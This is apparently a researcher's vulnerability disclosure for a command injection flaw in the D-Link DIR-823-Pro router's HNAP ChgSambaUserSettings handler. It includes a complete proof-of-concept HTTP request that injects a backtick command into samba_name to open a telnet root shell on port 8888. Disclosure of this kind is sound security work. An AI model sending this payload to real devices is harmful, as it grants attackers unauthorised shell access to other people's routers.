# D-Link Vulnerability

Vendor:D-Link

Product:DIR-823-Pro

Version:1.0.2(Download Link:http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-823+Pro)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability  in D-Link router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `prog.cgi` binary:

In `ChgSambaUserSettings` function, `samba_name` is directly passed by the attacker, so we can control the `samba_name` to attack the OS.

As you can see here, the initial input will be extracted and cause command injection.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.



## PoC

We set `samba_name` as **`telnetd -l /bin/sh -p 8888 -b 0.0.0.0`** , and the router will excute it,such as:

```http
POST /HNAP1/ HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/ChgSambaUserSettings"
HNAP_AUTH: 236D363A3324B4D33D0466BD4EAA2960 1642486637735
Content-Length: 278
Origin: http://192.168.100.1
Connection: close
Referer: http://192.168.100.1/SharePortSetup.html
Cookie: work_mode=router; uid=TAKW7lXk; PrivateKey=06DD3A6C241B81071DA1F67028CDB5E8; timeout=3

{"ChgSambaUserSettings":{"samba_num":"0","samba_name":"`telnetd -l /bin/sh -p 8888 -b 0.0.0.0`","samba_readonly":"no","samba_pwd":"8534429b4732d54ca4bdcbc534080c516faf429b3632d550a4bd80c534c10c516faf429b3632d550a4bd80c534c10c516faf429b3632d550a4bd80c534c10c51","samba_dir":"/"}}
```

<div  align="center"><img src="./images/2.png" style="zoom:80%;" /></div>



## Result

Get a shell!

<div  align="center"><img src="./images/3.png" style="zoom:80%;" /></div>
